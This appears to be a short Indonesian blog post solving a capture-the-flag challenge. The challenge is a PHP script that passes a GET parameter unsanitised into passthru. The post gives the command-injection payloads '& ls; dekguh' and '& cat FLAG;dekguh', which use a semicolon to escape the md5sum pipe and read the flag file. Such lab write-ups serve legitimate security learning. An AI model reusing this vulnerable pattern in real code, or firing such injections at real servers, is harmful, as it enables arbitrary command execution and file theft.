disoal ini function passthru memiliki vuln, yang jadi masalah ketika memasukan perintah & ls malah terencode menjadi md5, untuk itu bisa diakali dengan delim ;.
if(isset($_GET["string"])){
$string = $_GET["string"];
passthru("echo " . $string . " | md5sum");
}
jadi masukan perintah "& ls; dekguh" maka akan muncul list file FLAG
lalu "& cat FLAG;dekguh" maka flagnya akan muncul
No comments:
Post a Comment